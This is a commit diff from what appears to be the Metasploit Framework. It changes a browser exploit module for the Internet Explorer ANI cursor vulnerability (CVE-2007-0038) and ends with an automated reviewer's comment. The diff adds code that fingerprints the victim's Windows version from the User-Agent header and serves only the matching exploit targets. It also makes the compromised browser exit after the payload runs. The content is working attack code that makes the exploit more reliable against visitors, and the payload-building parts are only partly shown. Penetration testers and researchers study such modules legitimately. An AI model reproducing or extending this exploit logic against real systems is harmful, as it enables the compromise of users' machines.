Automatic target detection based on the user agent

git-svn-id: file:///home/svn/framework3/trunk@4600 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-04-01 21:05:05 +00:00
parent f0fcedf728
commit 775d8bc95b
1 changed files with 28 additions and 7 deletions


@ -55,8 +55,8 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
],
'DefaultOptions' =>
{
# Cause the shellcode to exit silently
'EXITFUNC' => 'seh',
# Cause internet explorer to exit after the code hits
'EXITFUNC' => 'process',
},
'Payload' =>
{
@ -75,7 +75,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
# Use multiple cursor URLs to try all targets at once
# This can result in multiple, sequential sessions
#
[ 'All Targets', { }],
[ 'Automatic', { }],
#
# The following targets use call [ebx+4], just like the original exploit
@ -126,6 +126,27 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
def on_request_uri(cli, request)
ros = /.*/
case request.headers['User-Agent']
when /Windows (NT |)4\.0/
ros = /NT 4/
when /Windows (NT |)5\.0/
ros = /2000/
when /Windows (NT |)5\.1/
ros = /XP/
when /Windows (NT |)5\.2/
ros = /2003/
when /Windows (NT |)6\.0/
ros = /Vista/
end
targ = nil
exts = ['bmp', 'wav', 'png', 'zip', 'tar']
gext = exts[rand(exts.length)]
@ -138,7 +159,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
mext = ruri =~ /\.(...)$/
if (not (mext and exts.include?($1)))
html =
"<html><head><title>" +
rand_text_alphanumeric(rand(128)+4) +
@ -147,10 +168,10 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
mytargs = (target.name =~ /All Targets/) ? targets : [target]
if target.name =~ /All Targets/
if target.name =~ /Automatic/
targets.each_index { |i|
next if not targets[i].ret
next if not targets[i].name =~ ros
html << generate_div(gext, i)
}
else
@ -201,7 +222,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
end
def generate_ani(payload, target)
# Build the first ANI header
anih_a = [
36, # DWORD cbSizeof
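Review bot: The new `ros` pattern in `on_request_uri` depends on the wording of the target names, since `/XP/`, `/2003/` and the others are matched against `targets[i].name` in the `targets.each_index` loop of the later hunk, and nothing in the code says so; renaming a target would silently change which entries are emitted. A comment above the `case` would make the coupling explicit, for example `# ros is matched against target names below; it stays /.*/ (no filtering) when the User-Agent is absent or unrecognised`. The User-Agent is a client-supplied header, so the comment should also say the match is a hint and not a verified OS version. The comment block above `[ 'Automatic', { }]` still reads "try all targets at once", which now describes only the fallback case and should be reworded. The body of `on_request_uri` continues outside the hunks shown.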